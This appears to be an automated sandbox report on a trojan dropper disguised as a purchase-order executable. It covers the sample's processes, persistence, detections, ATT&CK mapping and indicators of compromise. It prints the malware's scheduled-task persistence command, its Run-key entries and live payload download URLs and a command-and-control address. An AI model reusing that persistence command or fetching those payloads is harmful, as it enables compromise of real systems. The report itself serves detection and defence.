                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0020374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,10_2_0020374E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00244B52 SendInput,keybd_event,10_2_00244B52
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00247DD5 mouse_event,10_2_00247DD5
                              Source: C:\Users\user\Desktop\Machine-PO.exe | Process created: C:\Users\user\Desktop\._cache_Machine-PO.exe "C:\Users\user\Desktop\._cache_Machine-PO.exe"
                              Source: C:\Users\user\Desktop\Machine-PO.exe | Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_0023B398
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_0023BE31
                              Source: TCPKPY.exe | Binary or memory string: Shell_TrayWnd
                              Source: Machine-PO.exe, 00000000.00000003.1496148183.0000000005E09000.00000004.00000020.00020000.00000000.sdmp, Machine-PO.exe, 00000000.00000000.1488871651.0000000000566000.00000002.00000001.01000000.00000003.sdmp, ._cache_Machine-PO.exe, 00000002.00000003.1503190646.0000000004391000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00227254 cpuid 10_2_00227254
                              Source: C:\Users\user\Desktop\Machine-PO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002240DA GetSystemTimeAsFileTime,__aulldiv,10_2_002240DA
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0027C146 GetUserNameW,10_2_0027C146
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00232C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_00232C3C
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0021E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_0021E47B
                              Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              Source: Yara match | File source: Machine-PO.exe, type: SAMPLE
                              Source: Yara match | File source: 0.0.Machine-PO.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: Machine-PO.exe PID: 5988, type: MEMORYSTR
                              Source: Yara match | File source: C:\ProgramData\Synaptics\RCX7868.tmp, type: DROPPED
                              Source: Yara match | File source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, type: DROPPED
                              Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: TCPKPY.exe.2.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: TCPKPY.exe, 00000019.00000002.2613943563.0000000004E9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81
                              Source: TCPKPY.exe | Binary or memory string: WIN_XP
                              Source: TCPKPY.exe | Binary or memory string: WIN_XPe
                              Source: TCPKPY.exe | Binary or memory string: WIN_VISTA
                              Source: TCPKPY.exe | Binary or memory string: WIN_7
                              Source: TCPKPY.exe | Binary or memory string: WIN_8
                              Source: TCPKPY.exe, 00000017.00000002.2017426062.0000000003FEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_819

                              Remote Access Functionality

                              Source: Yara match | File source: Machine-PO.exe, type: SAMPLE
                              Source: Yara match | File source: 0.0.Machine-PO.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match | File source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: Machine-PO.exe PID: 5988, type: MEMORYSTR
                              Source: Yara match | File source: C:\ProgramData\Synaptics\RCX7868.tmp, type: DROPPED
                              Source: Yara match | File source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, type: DROPPED
                              Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002591DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_002591DC
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002596E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_002596E2
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | 421 Scripting | 2 Valid Accounts | 11 Windows Management Instrumentation | 421 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                              Credentials | Domains | 1 Replication Through Removable Media | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 2 Valid Accounts | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | Input Capture | 34 Application Layer Protocol | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | 21 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 Extra Window Memory Injection | LSA Secrets | 38 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 112 Masquerading | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Scheduled Task/Job | 2 Valid Accounts | DCSync | 141 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 21 Virtualization/Sandbox Evasion | Proc Filesystem | 21 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 3 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 11 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                              Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              Behavior Graph ID: 1582336 | Sample: Machine-PO.exe | Startdate: 30/12/2024 | Architecture: WINDOWS | Score: 100
                              Start
                                DNS/IP: freedns.afraid.org (signature: Uses dynamic DNS services); xred.mooo.com; 4 other IPs or domains
                                Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 18 other signatures
                                Started: Machine-PO.exe [1 6]; TCPKPY.exe; EXCEL.EXE [228 68]; 6 other processes
                                Machine-PO.exe [1 6]
                                  Dropped: C:\Users\user\...\._cache_Machine-PO.exe (PE32); C:\ProgramData\Synaptics\Synaptics.exe (PE32); C:\ProgramData\Synaptics\RCX7868.tmp (PE32); C:\...\Synaptics.exe:Zone.Identifier (ASCII)
                                  Started: ._cache_Machine-PO.exe [2 5]; Synaptics.exe [46]
                                  ._cache_Machine-PO.exe [2 5]
                                    DNS/IP: 172.111.138.100, 49729, 49786, 49802, VOXILITYGB, United States
                                    Dropped: C:\Users\user\AppData\Roaming\...\TCPKPY.exe (PE32); C:\Users\user\AppData\Local\Temp\UAINOJ.vbs (ASCII)
                                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                                    Started: cmd.exe [1]; wscript.exe
                                    cmd.exe [1]
                                      Signature: Uses schtasks.exe or at.exe to add and modify task schedules
                                      Started: conhost.exe; schtasks.exe
                                    wscript.exe
                                      Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                  Synaptics.exe [46]
                                    DNS/IP: drive.usercontent.google.com 172.217.16.193, 443, 49716, 49717, GOOGLEUS, United States; docs.google.com 216.58.206.46, 443, 49709, 49710, GOOGLEUS, United States; freedns.afraid.org 69.42.215.252, 49714, 80, AWKNET-LLCUS, United States
                                    Dropped: C:\Users\user\Documents\PIVFAGEAAV\~$cache1 (PE32)
                                    Signature: Drops PE files to the document folder of the user
                                    Started: WerFault.exe
                                TCPKPY.exe
                                  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                                EXCEL.EXE [228 68]
                                  Started: splwow64.exe

Source | Detection | Scanner | Label
Machine-PO.exe | 86% | Virustotal |
Machine-PO.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
Machine-PO.exe | 100% | Avira | TR/Dldr.Agent.SH
Machine-PO.exe | 100% | Avira | HEUR/AGEN.1353217
Machine-PO.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
Machine-PO.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | 100% | Avira | HEUR/AGEN.1353217
C:\Users\user\Desktop\._cache_Machine-PO.exe | 100% | Avira | HEUR/AGEN.1353217
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | HEUR/AGEN.1353217
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH
C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\RCX7868.tmp | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX7868.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\AppData\Local\Temp\UAINOJ.vbs | 100% | Avira | VBS/Runner.VPJI
C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\._cache_Machine-PO.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML |
C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\RCX7868.tmp | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\RCX7868.tmp | 92% | ReversingLabs | Win32.Worm.Zorex
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | 61% | ReversingLabs | Win32.Trojan.Lisk
C:\Users\user\Desktop\._cache_Machine-PO.exe | 61% | ReversingLabs | Win32.Trojan.Lisk
C:\Users\user\Documents\PIVFAGEAAV\~$cache1 | 92% | ReversingLabs | Win32.Worm.Zorex
                              No Antivirus matches
                              No Antivirus matches
Source | Detection | Scanner | Label
http://xred.site50.net/syn/SSLLibrary.dl | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 216.58.206.46 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
drive.usercontent.google.com | 172.217.16.193 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl= | Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/Synaptics.rarZ | Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1 | Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp; Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1: | Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/Synaptics.rar | Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlP | Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/h | Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.google.com/ | Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.1845982405.000000000F093000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.1816797943.00000000007C3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SSLLibrary.dl | Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://xred.site50.net/syn/SSLLibrary.dll6 | Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1: | Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/google.com/J | Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1 | Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp; Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 | Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/X | Synaptics.exe, 00000003.00000002.1825407310.0000000007D23000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SUpdate.iniZ | Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SUpdate.ini | Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978p | Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16 | Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://docs.google.com/uc?id=0; | Synaptics.exe, 00000003.00000002.1842892634.000000000D73E000.00000004.00000010.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.1849242482.00000000106FE000.00000004.00000010.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SSLLibrary.dll | Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp; Synaptics.exe, 00000003.00000002.1817703537.00000000021E0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/7 | Synaptics.exe, 00000003.00000002.1821368617.00000000053A0000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
172.217.16.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
216.58.206.46 | docs.google.com | United States | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582336
Start date and time: 2024-12-30 11:24:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Machine-PO.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@23/39@6/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 41
• Number of non-executed functions: 311
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 184.28.90.27, 52.168.112.67, 20.189.173.21, 20.190.159.23, 52.149.20.212, 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdwus16.westus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, onedscolprdeus04.eastus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
05:25:19 | API Interceptor | 154x Sleep call for process: Synaptics.exe modified
05:25:43 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
05:27:16 | API Interceptor | 16x Sleep call for process: splwow64.exe modified
11:25:16 | Task Scheduler | Run new task: UAINOJ.exe path: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
11:25:16 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UAINOJ "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
11:25:24 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:25:33 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UAINOJ "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
11:25:41 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.111.138.100 | 222.exe | malicious | LodaRAT, XRed |
172.111.138.100 | mmi8nLybam.exe | malicious | LodaRAT |
172.111.138.100 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed |
172.111.138.100 | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed |
172.111.138.100 | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed |
172.111.138.100 | RNEQTT.exe | malicious | LodaRAT, XRed |
172.111.138.100 | Bank Information Details.bat | malicious | LodaRAT, XRed |
172.111.138.100 | Purchase Order Supplies.Pdf.exe | malicious | LodaRAT |
172.111.138.100 | bf-p2b.exe | malicious | LodaRAT |
172.111.138.100 | gry.exe | malicious | Unknown |
69.42.215.252 | 222.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | zhuzhu.exe | malicious | GhostRat, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | RNEQTT.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | ZmrwoZsbPp.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | ccmsetup.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
69.42.215.252 | Synaptics.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            s-part-0017.t-0009.t-msedge.netuniversityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
                                                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.45
| installer64v9.5.7.msi | malicious | Unknown | 13.107.246.45
| zhuzhu.exe | malicious | GhostRat, XRed | 13.107.246.45
| 017069451a4dbc523a1165a2f1bd361a762bb40856778.exe | malicious | Unknown | 13.107.246.45
| http://nemoinsure.com | malicious | Unknown | 13.107.246.45
| https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlD | malicious | Unknown | 13.107.246.45
| file.exe | malicious | LummaC | 13.107.246.45
freedns.afraid.org | 222.exe | malicious | LodaRAT, XRed | 69.42.215.252
| Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 69.42.215.252
| zhuzhu.exe | malicious | GhostRat, XRed | 69.42.215.252
| Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 69.42.215.252
| blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | 69.42.215.252
| New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 69.42.215.252
| RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
| ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
| ccmsetup.exe | malicious | XRed | 69.42.215.252
| Synaptics.exe | malicious | XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VOXILITYGB | 222.exe | malicious | LodaRAT, XRed | 172.111.138.100
| mmi8nLybam.exe | malicious | LodaRAT | 172.111.138.100
| Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 172.111.138.100
| loligang.mips.elf | malicious | Mirai | 104.250.189.221
| Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 172.111.138.100
| New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 172.111.138.100
| RNEQTT.exe | malicious | LodaRAT, XRed | 172.111.138.100
